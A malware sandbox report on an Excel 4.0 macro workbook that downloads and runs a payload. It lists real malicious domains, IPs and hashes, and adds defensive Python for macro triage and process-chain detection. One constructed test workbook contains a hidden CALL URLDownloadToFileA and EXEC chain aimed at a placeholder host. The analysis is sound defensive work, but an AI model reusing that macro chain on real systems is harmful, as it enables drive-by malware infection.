Analysis Report 3F97s4aQjB.xlsx
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
3F97s4aQjB.xlsx | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
Sigma Overview |
---|
System Summary: |
---|
- Sigma detected: Microsoft Office Product Spawning Windows Shell. Rule authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Signature Overview |
---|
AV Detection: |
---|
- Multi AV Scanner detection for domain / URL. Source: Virustotal
- Machine Learning detection for dropped file. Source: Joe Sandbox ML (2 dropped files)
- Further evidence rows in this section (signature names and values not included): File opened; HTTPS traffic detected (2); Binary string (2); Code function
Software Vulnerabilities: |
---|
- Document exploit detected (drops PE files). Source: File created (dropped file)
- Document exploit detected (UrlDownloadToFile). Source: Section loaded
- Document exploit detected (process start blacklist hit). Source: Process created
- Further evidence rows in this section (signature names and values not included): Memory has grown; DNS query; TCP traffic (2); ASN Name; JA3 fingerprint; DNS traffic detected; String found in binary or memory (158); Network traffic detected (4); HTTPS traffic detected (2)
System Summary: |
---|
- Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros). Source: Screenshot OCR (2)
- Contains functionality to create processes via WMI. Source: Binary or memory string
- Found abnormal large hidden Excel 4.0 Macro sheet. Source: Initial sample
- Office process drops PE file. Source: File created (2 dropped files)
- Further evidence rows in this section (signature names and values not included): Process Stats; Code function (19); Classification label; File created (2); Mutant created; WMI Queries; File read (3); Key opened (2); Process created (5); Key value queried; Window detected; Initial sample; File opened; Binary string (2); Code function (3)
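What the signatures "Found abnormal large hidden Excel 4.0 Macro sheet" and "Document exploit detected (UrlDownloadToFile)" rest on can be checked statically, before detonation. The Python below is an added example, not part of this report and not Joe Sandbox or Microsoft code: it reads an OOXML workbook's zip container directly, lists the macro sheet parts, reads their visibility from xl/workbook.xml, looks for an Auto_Open name and scans the macro formulas for download and execute calls. The workbook it builds is a constructed minimum for this parser (no [Content_Types].xml, so Excel itself would reject it) with a placeholder URL, and the function list in SUSPICIOUS_XLM is this example's own choice. The page does not say whether the sample is an OOXML or a legacy BIFF (.xls) container, which is also commonly renamed to .xlsx; this code handles the OOXML case only.

```python
# Added example: static triage of Excel 4.0 (XLM) macro sheets in an OOXML workbook.
# Not part of the Joe Sandbox report; the sample workbook and the URL in it are constructed.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_MACROSHEET = NS_REL + "/xlMacrosheet"
REL_WORKSHEET = NS_REL + "/worksheet"

# XLM calls that download, execute or rewrite cells; the list is this example's own choice.
SUSPICIOUS_XLM = re.compile(
    r"\b(EXEC|CALL|REGISTER|FORMULA(?:\.FILL)?|URLDOWNLOADTOFILE|SHELLEXECUTE)\s*\(", re.IGNORECASE)


def _q(tag):
    return f"{{{NS_MAIN}}}{tag}"  # namespace-qualify a SpreadsheetML tag for ElementTree


def triage_xlsx(data: bytes) -> dict:
    """Inspect an xlsx/xlsm blob. 'verdict' is True when a macro sheet exists and is hidden,
    is wired to Auto_Open, or contains a flagged formula."""
    result = {
        "macrosheets": [],          # zip parts under xl/macrosheets/
        "hidden_macrosheets": [],   # (sheet name, state) for hidden / veryHidden macro sheets
        "auto_open": [],            # targets of Auto_Open defined names (run when the file opens)
        "suspicious_formulas": [],  # (part, cell, formula text)
        "verdict": False,
    }
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        result["macrosheets"] = sorted(
            n for n in z.namelist() if n.startswith("xl/macrosheets/") and n.endswith(".xml"))
        if not result["macrosheets"]:
            return result
        # Relationship id -> zip part, so a <sheet> entry can be tied to its macro part.
        rid_to_part = {}
        for rel in ET.fromstring(z.read("xl/_rels/workbook.xml.rels")):
            if rel.get("Type") == REL_MACROSHEET:
                target = rel.get("Target")
                rid_to_part[rel.get("Id")] = target[1:] if target.startswith("/") else "xl/" + target
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        for sheet in wb.iter(_q("sheet")):
            state = sheet.get("state", "visible")  # visible | hidden | veryHidden
            if sheet.get(f"{{{NS_REL}}}id") in rid_to_part and state in ("hidden", "veryHidden"):
                result["hidden_macrosheets"].append((sheet.get("name"), state))
        for dn in wb.iter(_q("definedName")):
            if dn.get("name", "").endswith("Auto_Open"):
                result["auto_open"].append(dn.text or "")
        for part in result["macrosheets"]:
            for cell in ET.fromstring(z.read(part)).iter(_q("c")):
                f = cell.find(_q("f"))
                if f is not None and SUSPICIOUS_XLM.search(f.text or ""):
                    result["suspicious_formulas"].append((part, cell.get("r"), f.text))
    result["verdict"] = bool(
        result["hidden_macrosheets"] or result["auto_open"] or result["suspicious_formulas"])
    return result


def build_sample_xlsx(with_macro: bool = True) -> bytes:
    """Constructed workbook: a visible sheet plus, optionally, a veryHidden Excel 4.0 macro sheet
    that downloads from a placeholder URL and runs the result. Only the parts this parser reads
    are present (no [Content_Types].xml), so Excel itself would not open it."""
    sheets = '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
    rels = f'<Relationship Id="rId1" Type="{REL_WORKSHEET}" Target="worksheets/sheet1.xml"/>'
    defined = ""
    if with_macro:
        sheets += '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        rels += f'<Relationship Id="rId2" Type="{REL_MACROSHEET}" Target="macrosheets/sheet1.xml"/>'
        defined = '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName></definedNames>'
    workbook = f'<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_REL}"><sheets>{sheets}</sheets>{defined}</workbook>'
    macro = (f'<xm:macrosheet xmlns="{NS_MAIN}" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
             '<sheetData><row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
             '"https://example.invalid/img/logo.png","C:\\Users\\Public\\logo.exe",0,0)</f><v>0</v></c></row>'
             '<row r="2"><c r="A2"><f>EXEC("C:\\Users\\Public\\logo.exe")</f><v>0</v></c></row>'
             '<row r="3"><c r="A3"><f>HALT()</f><v>0</v></c></row></sheetData></xm:macrosheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", f'<Relationships xmlns="{NS_PKG_REL}">{rels}</Relationships>')
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{NS_MAIN}"><sheetData/></worksheet>')
        if with_macro:
            z.writestr("xl/macrosheets/sheet1.xml", macro)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_xlsx(build_sample_xlsx()))
```

For BIFF workbooks, olevba from oletools (0.56 or later) also extracts Excel 4.0 macro formulas, and the same three checks (hidden state, Auto_Open, EXEC/CALL formulas) apply to its output. The "abnormal large" part of the report's signature is a size heuristic on the macro sheet whose threshold the page does not state, so it is not reproduced here.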
Persistence and Installation Behavior: |
---|
- Creates processes via WMI. Source: WMI Queries
- Further evidence rows in this section (signature names and values not included): File created, dropped file (5)
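The Sigma rule listed under Sigma Overview matches on the parent/child pair Office product to Windows shell, while the "Creates processes via WMI" signature describes a second launch path: Excel asks the WMI service to create the process, so the new process's parent is WmiPrvSE.exe and the Office lineage is not visible in the process tree. The Python below is an added example (not from the report, Joe Sandbox or the Sigma project) that evaluates both checks, plus one for an executable launched from a user profile root as in "Drops PE files to the user root directory", over constructed Sysmon-style process creation events. The Excel image path is the one the report shows; every other path, and the event list itself, is made up for the example.

```python
# Added example: process-creation checks for the Office -> shell chain this report describes.
# Not from the report, Joe Sandbox or the Sigma project. Only the Excel path is the report's;
# the other paths and the event list are constructed.
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
WMI_HOST = "wmiprvse.exe"
# C:\Users\<profile>\<name>.exe and nothing deeper: a PE sitting in the user root directory.
USER_ROOT_EXE = re.compile(r"^c:\\users\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev: dict) -> bool:
    """The Sigma rule's condition: an Office product is the direct parent of a shell."""
    return basename(ev["ParentImage"]) in OFFICE_IMAGES and basename(ev["Image"]) in SHELL_IMAGES


def wmi_spawned_shell(ev: dict) -> bool:
    """A shell whose parent is the WMI provider host. This is what a Win32_Process.Create
    call from Excel looks like in the process tree: the Office lineage is gone, so the
    Sigma rule above never matches it."""
    return basename(ev["ParentImage"]) == WMI_HOST and basename(ev["Image"]) in SHELL_IMAGES


def exe_in_user_root(ev: dict) -> bool:
    """An executable started from the root of a user profile directory."""
    return USER_ROOT_EXE.match(ev["Image"]) is not None


RULES = [
    ("office_spawns_shell", office_spawns_shell),
    ("wmi_spawned_shell", wmi_spawned_shell),
    ("exe_in_user_root", exe_in_user_root),
]


def evaluate(events: list) -> list:
    """Return (rule name, event index) for every rule that matches an event, in event order."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


EXCEL = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"  # path from the report
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"

# Constructed Sysmon event 1 style records (Image / ParentImage only), not the report's tree.
SAMPLE_EVENTS = [
    {"Image": EXCEL, "ParentImage": r"C:\Windows\explorer.exe"},            # user opens the workbook
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": EXCEL},         # direct spawn: rule 1
    {"Image": WMIPRVSE, "ParentImage": r"C:\Windows\System32\svchost.exe"},  # WMI host, benign on its own
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": WMIPRVSE},      # WMI-created shell: rule 2 only
    {"Image": r"C:\Users\user\logo.exe", "ParentImage": WMIPRVSE},           # dropped PE in user root: rule 3
    {"Image": r"C:\Windows\splwow64.exe", "ParentImage": EXCEL},             # print helper, benign
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[idx]['ParentImage']} -> {SAMPLE_EVENTS[idx]['Image']}")
```

Rule 2 has no Office lineage to lean on, so on hosts where administration runs through WMI it needs correlation (for instance with the Excel process's own WMI activity, which this report records under "WMI Queries") before it is alertable; what it buys is that the WMI launch path cannot silently bypass the parent/child rule.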
Boot Survival: |
---|
- Drops PE files to the user root directory. Source: File created (dropped file)
- Further evidence rows (section and signature names and values not included): Process information set (61); Code function; Evasive API call chain; API coverage; Last function; Code function; Binary or memory string (4); Process information queried; Code function (10); File source; Binary or memory string (4); Code function (28)
Mitre Att&ck Matrix |
---|
Techniques with at least one matching signature (the digits in parentheses are the signature counts the original matrix renders as superscripts; template cells without a count are omitted): |
---|
Tactic | Techniques |
---|---|
Execution | Windows Management Instrumentation (21), Scripting (1), Native API (2), Exploitation for Client Execution (33) |
Privilege Escalation | Process Injection (2), Extra Window Memory Injection (1) |
Defense Evasion | Masquerading (121), Disable or Modify Tools (1), Process Injection (2), Deobfuscate/Decode Files or Information (1), Scripting (1), Obfuscated Files or Information (2), Extra Window Memory Injection (1) |
Discovery | System Time Discovery (1), Security Software Discovery (21), Process Discovery (2), Account Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1), System Network Configuration Discovery (1), File and Directory Discovery (2), System Information Discovery (14) |
Collection | Archive Collected Data (1) |
Command and Control | Encrypted Channel (12), Non-Application Layer Protocol (1), Application Layer Protocol (2) |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
3F97s4aQjB.xlsx | 7% | Virustotal | |
3F97s4aQjB.xlsx | 2% | ReversingLabs | |
Dropped Files |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
(dropped file) | 100% | Joe Sandbox ML | |
(dropped file) | 100% | Joe Sandbox ML | |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
(domain) | 8% | Virustotal | |
URLs |
---|
95 URLs were checked and none flagged: 89 rated safe by URL Reputation, 4 rated safe by Avira URL Cloud, 2 at 0% on Virustotal (the URL values themselves are not included). |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
injuryless.com | 193.178.169.243 | true | true | | unknown |
pigeonious.com | 95.142.44.93 | true | false | | unknown |
URLs from Memory and Binaries |
---|
100 URLs were extracted from memory and binaries (values not included); none is marked malicious; reputation is high for 72 and unknown for 28. |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
193.178.169.243 | injuryless.com | unknown | 48282 | VDSINA-ASRU | true |
95.142.44.93 | pigeonious.com | Russian Federation | 210079 | EUROBYTEEurobyteLLCMoscowRussiaRU | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 432818 |
Start date: | 10.06.2021 |
Start time: | 19:28:46 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 39s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 3F97s4aQjB.xlsx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 38 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSX@5/12@2/2 |
HCA Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
19:29:44 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated samples |
---|---|
193.178.169.243 | 1 associated sample, detection malicious (sample name and SHA 256 not included) |
Domains |
---|
Match | Associated samples |
---|---|
injuryless.com | 1 associated sample, detection malicious (sample name and SHA 256 not included) |
ASN |
---|
Match | Associated samples |
---|---|
VDSINA-ASRU | 20 associated samples, all with detection malicious (sample names and SHA 256 not included) |
EUROBYTEEurobyteLLCMoscowRussiaRU | 20 associated samples, all with detection malicious (sample names and SHA 256 not included) |
JA3 Fingerprints |
---|
Match | Associated samples |
---|---|
37f463bf4616ecd445d4a1937da06e19 | 20 associated samples, all with detection malicious (sample names and SHA 256 not included) |
The download in this analysis was made by EXCEL.EXE through URLDownloadToFile (the downloaded file below carries an IE Cache URL), so this JA3 value fingerprints the Windows TLS stack used by Excel rather than a custom malware client; the IP and domain, not the JA3 hash, are the indicators worth blocking. |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 511488 |
Entropy (8bit): | 7.3404073760047375 |
Encrypted: | false |
SSDEEP: | 12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N |
MD5: | 526D56017EF5105277FE0D366C95C39D |
SHA1: | 78A40D523F4B887B2383681FECE447EF911C24EF |
SHA-256: | 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2 |
SHA-512: | F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134922 |
Entropy (8bit): | 5.369120137160444 |
Encrypted: | false |
SSDEEP: | 1536:6cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:qEQ9DQW+ziXOe |
MD5: | 0A1F23FF748ABC83EE1A72CDC88321CC |
SHA1: | 4BC44446EB9EFC70B3906CCB9C2027CFB370DC9A |
SHA-256: | A05BF9F74150184E3664C14A9B042AF23BB0A75DBA671DB351A1172FF550A47B |
SHA-512: | 6CE5A0DC7CB9A2749451DE3752DCF2E8A37CFDC6B19C53E79782CC00859C1E4333474641E76EE975EAA169CE136E9A4A7771532866437CDBE49DEA5E8EE7047E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 462772 |
Entropy (8bit): | 7.968569347884841 |
Encrypted: | false |
SSDEEP: | 12288:yycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAdee:yQMfYBVf1xBARkgaNyr |
MD5: | 5D1C907B7A28ED91D8A704A7CE928FAF |
SHA1: | FA56635F0C2A6D93DABE3E0636DADEAECDFCE804 |
SHA-256: | AD72EF87E54764A13E87BBD446029F48D70114B120E6DA7025947B1D51554486 |
SHA-512: | 52A22A801395A467AABC02B4C24236FCAC4197407FC0F5C4B0D9C79C8DFB9A5DD0D935C67A7730B7EBFCD80013967F392D48D6E697A09E684BCDC62F7DBB6376 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 511488 |
Entropy (8bit): | 7.3404073760047375 |
Encrypted: | false |
SSDEEP: | 12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N |
MD5: | 526D56017EF5105277FE0D366C95C39D |
SHA1: | 78A40D523F4B887B2383681FECE447EF911C24EF |
SHA-256: | 28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2 |
SHA-512: | F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E |
Malicious: | true |
Antivirus: |
Reputation: | low |
IE Cache URL: | https://pigeonious.com/img/logo.png |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1041071 |
Entropy (8bit): | 7.855849071117974 |
Encrypted: | false |
SSDEEP: | 12288:Ip4WH4vcCRa6p1RtTycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAde+:G4vdRa6p1Rt/QMfYBVf1xBARkgaNyt |
MD5: | E20BC69C6969DDBF5D19950216EBCC79 |
SHA1: | 60809A68836DCE9E7B5959B9D975427C3DDE0122 |
SHA-256: | FDED8F0DDE8CF5DEACFB80DE6420A3CCD4F30971ACC364FF9DB855DE3D86AA4A |
SHA-512: | C48879E97FC9DBBFA30C8554A1B21BC8D36B080F4AD6D4C0223C5F994C47BE4986ECEEBA038E4617EF4D8D65106E21FEA79042997BF107F2921828B35DCEE16D |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2120 |
Entropy (8bit): | 4.714364232851571 |
Encrypted: | false |
SSDEEP: | 24:8zNDaX/da9OUAJHaD0nKD7aB6myzNDaX/da9OUAJHaD0nKD7aB6m:8zNONJDnKaB6pzNONJDnKaB6 |
MD5: | B472516A8AC5D58E2AC16C39CD89EC38 |
SHA1: | 8ADE9F104953A38DA6917729E309528DD86C2E7C |
SHA-256: | 3677EBF291B1C7954ADB892D9D37686C0520C71F33EFF9F8D305985E09D5E0AC |
SHA-512: | 4DFC0887B9E26EE12B7D70CD543C2C3105EE9753746005B86D520EBFC52C50E787818F42A05EC120FA1F52FB927AE7A93DAFA1FCD40624E1E8A29439683E5EB0 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.652208144122537 |
Encrypted: | false |
SSDEEP: | 12:8YrXUwcuElPCH2AaSY3ouIk+WrjAZ/2bD/LC5Lu4t2Y+xIBjKZm:8cDatAZiD+87aB6m |
MD5: | 86C3AEC66964F8B6866416E31E93962D |
SHA1: | 3C2C30D348DA6A080E03B52ED039E806F29420D2 |
SHA-256: | BC2C38396F73A0F45177582F64F18992E369E9955EAA89B3DB11823DB19FF1A0 |
SHA-512: | 7F6EB1D91A178E2E39ABBE6560701395E4E9C6F5E1D0F3E4516E33A27D672EF3CB59756004835213BF5935B68946580A7346DD242648B8F61614EC081D103DA2 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 100 |
Entropy (8bit): | 4.721266094754729 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWV2npWrXCMjD2npWrXCmxWV2npWrXCv:djlW3KWvWI |
MD5: | 4651D7899D0089D49B209C1EEFFC6F66 |
SHA1: | 272A788D9B7814F71C0E53A39A8457512DD43BC2 |
SHA-256: | 7DD3385C0FA67DE6A3477E1E63F4598339456786CC8C0E4B36F667A7D3BAB4FC |
SHA-512: | 93F4F6602DDC965678EB92C40E9C73174C52A2CBC8D111181744E646380B5E41F0197925086ED935B75D1C5627FBE684C373081B73404FC1CBCEB329959B9BC0 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1040132 |
Entropy (8bit): | 7.8545301896779085 |
Encrypted: | false |
SSDEEP: | 24576:lQPPPPPD5rIf8w195QMfYBVf1xBARkgaNyn:BQMQh/m6Nyn |
MD5: | 90305FD4215DD8A8785DC7F6DD4143A6 |
SHA1: | A90ED0830BF373E01681C2B491101CD5AF1904A2 |
SHA-256: | 384AC8CE1FF6CF1E8DBDF47CE04898887D669811B982655881FD2FB6F8BCED4D |
SHA-512: | 50D827E068818BB082EB80487D4CF76C8D835CB6BEAA950F1A4BD6185C61F59F0F34328F3154CBA5274C49F3778878E315B173B5470D46482D674FD3BECB0851 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\wbem\WMIC.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160 |
Entropy (8bit): | 5.083203110114614 |
Encrypted: | false |
SSDEEP: | 3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglVvlJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/eg3leAin |
MD5: | 04F5182CC4DB0183A73CC7E970598ED7 |
SHA1: | B8E7038F8D7FA64B8FC04EFEBB0100998379C772 |
SHA-256: | BB316A44410761BABF389A30CA439E952E13C90178E4D3E9C54F45B83998EBE0 |
SHA-512: | C875CC61B3E6DBDACFD26D6FA0D28F134572D1C8EF955357A2C40BC3B6FF6A6637C325B0237D1DA7E281595A85197E74B54C7FC4FA57B17C9E09F7913A64C199 |
Malicious: | false |
Preview: |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.994144310692157 |
TrID: |
File name: | 3F97s4aQjB.xlsx |
File size: | 468533 |
MD5: | 1ac719c744d22f42e4978e7b55828435 |
SHA1: | 4ddc7358f615987bf92ed9192430693db65b097c |
SHA256: | d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb |
SHA512: | 736bcf96ca99c893c535c555133a092400e1dbc5f5143500d152c537bccc9d3faf7d541b3b11be82b68bbf4c7a1528c5fa3b45394d5b2b958c4d1d4d024e7d22 |
SSDEEP: | 12288:ag+iWCVTHlJFnI6TDEeTSH/NJDjXcXdeanuxZ2:4iVVTHxNcoSJDK1nuxA |
File Content Preview: | PK...........R................docProps/PK..........!.,...............docProps/app.xml.S.N.0.....`.N...Zu.#T.XQ.....u&.EbG.......m.ZNp{3o........"-8....x.Q.F.\.ML......x.&..5...xz-...Kg.p... a|LK.f..W%....m.SXWK...0[.Z..U.5.d.Qt.`.`r./.^..)N[..hn.....vM... |
File Icon |
---|
Icon Hash: | 74ecd0d2d6d6d0dc |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "3F97s4aQjB.xlsx" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/10/21-19:29:51.613358 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | 192.168.2.3 | 8.8.8.8 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 10, 2021 19:29:43.258378983 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.336587906 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.336781979 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.337631941 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.415893078 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.415950060 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.415990114 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.416032076 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.416059971 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.416095018 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.416150093 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.416157007 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.416161060 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.417321920 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.417413950 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.435136080 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.513605118 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.513775110 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.514929056 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593521118 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593578100 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593615055 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
